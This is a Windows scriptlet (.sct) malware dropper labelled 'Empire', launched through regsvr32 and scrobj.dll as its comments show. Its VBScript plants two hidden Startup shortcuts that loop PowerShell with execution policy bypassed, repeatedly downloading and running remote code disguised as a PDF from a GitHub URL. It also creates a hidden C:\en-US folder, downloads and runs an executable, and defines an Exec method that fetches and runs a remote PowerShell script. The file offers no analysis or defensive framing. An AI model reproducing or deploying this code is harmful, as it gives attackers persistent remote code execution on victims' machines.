<?XML version="1.0"?>
<scriptlet>

<registration
    description="Empire"
    progid="Empire"
    version="1.00"
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"
	>
	<!-- regsvr32 /s /i"C:\Bypass\o_MsgBox.sct" scrobj.dll -->
	<!-- regsvr32 /s /i:http://server/o_MsgBox.sct scrobj.dll -->
	<!-- That should work over a proxy and SSL/TLS... -->
	<!-- Credits Of Concept - al -murtadin  -->
	<script language="VBScript">
		<![CDATA[
		
		 set WshShell = CreateObject("WScript.Shell")
strDesktop = WshShell.SpecialFolders("Programs")
set oShellLink = WshShell.CreateShortcut(strDesktop & "\Startup\amel.lnk")
oShellLink.TargetPath = "cmd.exe"
oShellLink.WindowStyle = 7
oShellLink.Arguments = "/c powershell -ExecutionPolicy b -w hidden -noexit -C for(;;){try{IEX((new-object net.webclient).downloadstring('https://raw.githubusercontent.com/riyantigomez/gomez22/master/n4.pdf'))}catch{}Start-Sleep 30}"
oShellLink.Save

set WshShell = CreateObject("WScript.Shell")
strDesktop = WshShell.SpecialFolders("Programs")
set oShellLink = WshShell.CreateShortcut(strDesktop & "\Startup\amel2.lnk")
oShellLink.TargetPath = "cmd.exe"
oShellLink.WindowStyle = 7
oShellLink.Arguments = "/c powershell -ExecutionPolicy b -w hidden -noexit -C for(;;){try{IEX((new-object net.webclient).downloadstring('https://raw.githubusercontent.com/riyantigomez/gomez22/master/n4.pdf'))}catch{}Start-Sleep 30}"
oShellLink.Save

Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FolderExists("C:\en-US") Then
Else
objFSO.CreateFolder "C:\en-US"
End If
Set fso = CreateObject("Scripting.FileSystemObject")
Set folderToHide = fso.getFolder("C:\en-US")
folderToHide.Attributes = folderToHide.Attributes or 2 ' 2 = hidden

ImageFile = "25.exe"
DestFolder = "C:\en-US\"
URL = "http://d13d.my-site.droppages.com/3.exe"
Set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET", URL, False
xml.Send
set oStream = createobject("Adodb.Stream")
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Const adSaveCreateNotExist = 2 
oStream.type = adTypeBinary
oStream.open
oStream.write xml.responseBody
oStream.savetofile DestFolder & ImageFile, adSaveCreateNotExist
oStream.close
set oStream = nothing
Set xml = Nothing

varNow = Now
while DateDiff("s",varNow,Now) < 120
wend
Set WshShell = CreateObject("WScript.Shell")
WshShell.run "C:\en-US\25.exe"
    
		]]>
</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
	
	function Exec()
	{

    w = new ActiveXObject("WScript.Shell");
		h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
		h.Open("GET","https://raw.githubusercontent.com/riyantigomez/gomez22/master/00.ps1",false);
		h.Send();
		c = h.ResponseText;
		ps = 'powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command ';
		r = new ActiveXObject("WScript.Shell").Exec(ps + c);
   
   
	}
	
]]>
</script>

</scriptlet>
